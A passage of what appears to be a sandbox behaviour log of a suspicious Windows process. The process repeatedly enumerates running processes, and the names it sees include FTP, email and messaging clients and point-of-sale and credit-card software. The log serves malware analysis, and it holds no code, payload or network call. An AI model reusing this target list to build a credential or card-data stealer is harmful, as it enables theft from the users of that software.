pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0182.863] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0182.865] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0182.867] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0182.869] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0182.871] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0182.872] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0182.874] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0182.876] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0182.880] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0182.882] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0182.883] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0182.885] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0182.887] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0182.889] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0182.891] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0182.893] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0182.895] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0182.938] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0182.940] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0182.942] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0182.944] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0182.946] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0182.947] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0182.949] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0182.951] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0182.953] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0182.954] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0182.956] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0182.958] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0182.959] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0182.961] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0182.963] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0182.965] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0182.966] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0182.968] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0182.970] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0183.016] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0183.018] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0183.019] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0183.021] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0183.023] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0183.025] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0183.027] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0183.028] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0183.030] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0183.031] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0183.033] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0183.035] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0183.036] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0183.038] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0183.039] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0183.041] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0183.043] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xdd8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0183.045] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0183.046] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0183.048] CloseHandle (hObject=0x17ec) returned 1 [0183.048] Sleep (dwMilliseconds=0x64) [0183.085] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0183.143] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.145] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0183.146] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0183.148] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0183.149] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0183.151] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0183.152] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0183.153] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0183.155] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0183.157] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.159] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.161] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0183.162] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.164] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.165] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.167] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.168] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.209] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.210] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.212] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0183.213] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0183.215] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0183.216] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0183.218] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.219] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0183.221] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0183.222] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, 